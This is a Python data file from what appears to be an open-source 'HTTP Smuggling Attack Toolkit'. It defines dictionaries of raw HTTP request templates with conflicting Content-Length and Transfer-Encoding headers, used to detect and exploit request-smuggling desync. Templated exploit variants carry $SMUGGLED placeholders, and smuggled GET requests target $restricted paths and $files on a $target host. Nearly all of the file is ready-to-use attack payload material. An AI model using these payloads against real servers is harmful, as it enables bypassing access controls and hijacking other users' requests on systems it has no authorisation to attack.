Home Explore Help
Sign In
epsylon
/
Smuggler
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Tree: 9116d617c1
Branches Tags
Smuggler
/
payloads
/
payloads.py

payloads.py 10 KB
History Raw

12345678910111213141516171819202122232425262728293031323334353637383940 
  1. #!/usr/bin/env python3 
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. """
    4. 

  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
    5. 

  5. 

  6. You should have received a copy of the GNU General Public License along
    7. 

  7. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
    8. 

  8. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    9. 

  9. """
    10. 

  10. payloads={
    11. 

  11.     'CL-CL-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\n\r\nY',
    12. 

  12.     'CL-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\nY',
    13. 

  13.     'CL-CL-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\nY',
    14. 

  14.     'TE-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\nY',
    15. 

  15.     'TE-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: identity, cow\r\nTransfer-Encoding: chunked\r\n\r\nY',
    16. 

  16.     'TE-TE-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: identity, cow\r\n\r\nY',
    17. 

  17.     'TE-CL-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 2\r\n\r\nY',
    18. 

  18.     'TE-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 1\r\n\r\nY',
    19. 

  19.     'CL-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nTransfer-Encoding: chunked\r\n\r\nY',
    20. 

  20.     'CL-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1\r\nTransfer-Encoding: chunked\r\n\r\nY'
    21. 

  21. 	 }
    22. 

  22. exploits={
    23. 

  23.     'CL-CL-0#$method $path HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
    24. 

  24.     'CL-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\n$SMUGGLED',
    25. 

  25.     'CL-CL-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\n$SMUGGLED',
    26. 

  26.     'TE-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED',
    27. 

  27.     'TE-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: identity, cow\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED',
    28. 

  28.     'TE-TE-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: identity, cow\r\n\r\n$SMUGGLED',
    29. 

  29.     'TE-CL-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 2\r\n\r\n$SMUGGLED',
    30. 

  30.     'TE-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 1\r\n\r\n$SMUGGLED',
    31. 

  31.     'CL-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED',
    32. 

  32.     'CL-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED'
    33. 

  33.      }
    34. 

  34. methods={
    35. 

  35.     '0#Y',
    36. 

  36.     '1#GET $path HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded',
    37. 

  37.     '2#GET $restricted HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded',
    38. 

  38.     '3#GET $files HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded'
    39. 

  39.      }
    40. 

  40.